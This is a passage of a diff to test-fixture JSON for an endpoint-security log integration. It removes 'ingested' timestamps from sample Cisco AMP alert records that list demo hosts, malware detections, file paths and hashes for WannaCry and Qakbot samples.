Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1001,7 +989,6 @@ ], "code": "553648143", "id": "6419229331435815000", - "ingested": "2022-02-02T05:53:17.131257211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -1075,7 +1062,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131257982Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1165,7 +1151,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131258771Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "severity": 2 @@ -1268,7 +1253,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131259545Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -1369,7 +1353,6 @@ ], "code": "1090519054", "id": "6419229327140848000", - "ingested": "2022-02-02T05:53:17.131260409Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -1468,7 +1451,6 @@ ], "code": "1090519054", "id": "6419229322845880000", - "ingested": "2022-02-02T05:53:17.131261172Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -1569,7 +1551,6 @@ ], "code": "2164260893", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131261932Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 @@ -1645,7 +1626,6 @@ ], "code": "2164260893", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131262685Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 @@ -1717,7 +1697,6 @@ ], "code": "553648155", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131263455Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 @@ -1791,7 +1770,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131264234Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 @@ -1871,7 +1849,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131264998Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "severity": 3 @@ -1951,7 +1928,6 @@ ], "code": "553648147", "id": "6411488666497057000", - "ingested": "2022-02-02T05:53:17.131265868Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "severity": 3 @@ -2040,7 +2016,6 @@ ], "code": "1107296274", "id": "1493058569636000800", - "ingested": "2022-02-02T05:53:17.131266639Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "severity": 4, @@ -2120,7 +2095,6 @@ ], "code": "553648155", "id": "6264772016730014000", - "ingested": "2022-02-02T05:53:17.131267404Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "severity": 3 @@ -2194,7 +2168,6 @@ ], "code": "553648147", "id": "6264772016730014000", - "ingested": "2022-02-02T05:53:17.131268158Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "severity": 3 @@ -2278,7 +2251,6 @@ ], "code": "553648147", "id": "6264772012435046000", - "ingested": "2022-02-02T05:53:17.131268916Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective 